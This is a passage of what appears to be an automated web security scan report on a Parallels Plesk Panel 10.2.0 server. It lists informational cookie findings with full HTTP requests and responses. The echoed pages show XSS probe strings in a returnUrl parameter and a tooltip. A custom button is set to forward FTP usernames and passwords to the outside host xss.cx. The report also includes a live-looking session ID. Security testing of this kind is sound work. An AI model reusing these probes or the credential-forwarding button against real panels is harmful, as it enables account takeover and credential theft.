           function CustomButtonsListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   CustomButtonsListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function CustomButtonsListSearchShow()
           {
               var sc = document.getElementById("CustomButtonsListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("CustomButtonsListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function CustomButtonsListSearchHide()
           {
               var sc = document.getElementById("CustomButtonsListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("CustomButtonsListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function CustomButtonsListRemove(f)
           {
               if (0 == CustomButtonsListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/custom-buttons/custom-button@multi/delete/";
               lsubmit(f);
               return false;
           }
       </script>

</td></tr></table></fieldset>

</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.10. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@2/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@2/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@2/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:21:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:21:01 GMT
Connection: close
Content-Length: 17825

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@2/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="inject" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="fdf080d92960a97399f5295d" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_512" id="fid-inc_bit_512" value="true" CHECKED > <label for="fid-inc_bit_512"><span class="hint">&amp;ftp_user=&lt;ftp_user&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_1024">Include FTP password</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1024" id="fid-inc_bit_1024" value="true" CHECKED > <label for="fid-inc_bit_1024"><span class="hint">&amp;ftp_pass=&lt;ftp_pass&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_2">Include customer ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_2" id="fid-inc_bit_2" value="true" CHECKED > <label for="fid-inc_bit_2"><span class="hint">&amp;cl_id=&lt;cl_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_4">Include customer's company name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_4" id="fid-inc_bit_4" value="true" CHECKED > <label for="fid-inc_bit_4"><span class="hint">&amp;cname=&lt;cname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_8">Include customer's contact name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_8" id="fid-inc_bit_8" value="true" CHECKED > <label for="fid-inc_bit_8"><span class="hint">&amp;pname=&lt;pname&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_16">Include customer's e-mail</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_16" id="fid-inc_bit_16" value="true" CHECKED > <label for="fid-inc_bit_16"><span class="hint">&amp;email=&lt;email&gt;</span></label></td>
</tr>


<tr >
   <td class="name"><label for="fid-conhelp">Tooltip text</label>&nbsp;</td>
   <td><textarea name="conhelp" id="fid-conhelp" rows="11" style="font-size:10px; width:128px;" cols="50" rows="10">will it take xss?</TEXTAREA></td>
</tr>

<tr>
   <td class="name"><label for="fid-internal">Open URL in Parallels Panel</label></td>
   <td><input type="checkbox" class="checkbox" name="internal" id="fid-internal" value="true" ></td>
</tr>

<tr>
   <td class="name"><label for="fid-private">Show to me only</label></td>
   <td><input type="checkbox" class="checkbox" name="private" id="fid-private" value="true" CHECKED ></td>
</tr>

</table>

<input type="hidden" name="cb_id" value="2">

</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/custom-buttons/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.11. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/custom-buttons/custom-button@3/properties/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/custom-buttons/custom-button@3/properties/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/custom-buttons/custom-button@3/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/custom-buttons/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:20:50 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:20:51 GMT
Connection: close
Content-Length: 17813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fcustom-buttons%252F%26src%3D%252Fsmb%252Faccount%26srcController%3DAccountController7bea8%25253c%25252fScRiPt%252520%25253ef9cde00af98' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Settings of a Link to an Additional Service</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/custom_button_client_edit/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/custom-buttons/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

           function update_oC(f)
           {
               f.cmd.value = "update";
               lsubmit(f);
               return false;
           }

           function place_oC(f)
           {
       f.inc_bit_1.disabled = !(("domain" == f.place.value))
f.inc_bit_32.disabled = !(("domain" == f.place.value))
f.inc_bit_512.disabled = !(("domain" == f.place.value))
f.inc_bit_1024.disabled = !(("domain" == f.place.value))
f.inc_bit_2.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_4.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_8.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))
f.inc_bit_16.disabled = !(("domain" == f.place.value) || ("client" == f.place.value) || ("reseller" == f.place.value))

           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Links to additional services","href":"\/plesk\/client@2\/custom-buttons\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/custom-buttons/custom-button@3/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

<legend>Custom button</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

<table class="formFields" cellspacing="0" width="100%">

<tr >
   <td class="name"><label for="fid-text">Button label</label>&nbsp;<span class="required">*</span></td>
   <td><input type="text" name="text" id="fid-text" value="XSS.CX" size="40" maxlength="254"></td>
</tr>

<tr>
   <td class="name"><label for="fid-place">Location</label></td>
   <td><select name="place" id="fid-place" onChange="place_oC(document.forms[0])">    <option value='navigation'>Common Access</option>
   <option value='domain' SELECTED>Websites &amp; Domains page of Subscription</option>
   <option value='client'>Customer&#039;s Home page</option>
</select>
</td>
</tr>

<tr >
   <td class="name"><label for="fid-sort_key">Priority</label></td>
   <td><input type="text" name="sort_key" id="fid-sort_key" value="100" size="15" maxlength="14"></td>
</tr>

<tr >
   <td class="name"><label for="fid-fname">Background image</label></td>
   <td><input type="file" name="fname" id="fid-fname"></td>
</tr>

<tr >
   <td class="name"><label for="fid-url">URL</label>&nbsp;<span class="required">*</span></td>

   <td><input type="text" name="url" id="fid-url" value="http://xss.cx" size="40" maxlength="254"></td>

</tr>


<tr>
   <td class="name"><label for="fid-inc_bit_1">Include subscription ID</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_1" id="fid-inc_bit_1" value="true" CHECKED > <label for="fid-inc_bit_1"><span class="hint">&amp;dom_id=&lt;dom_id&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_32">Include Primary Domain name</label></td>
   <td><input type="checkbox" class="checkbox" name="inc_bit_32" id="fid-inc_bit_32" value="true" CHECKED > <label for="fid-inc_bit_32"><span class="hint">&amp;dom_name=&lt;dom_name&gt;</span></label></td>
</tr>

<tr>
   <td class="name"><label for="fid-inc_bit_512">Include FTP username</label></td>
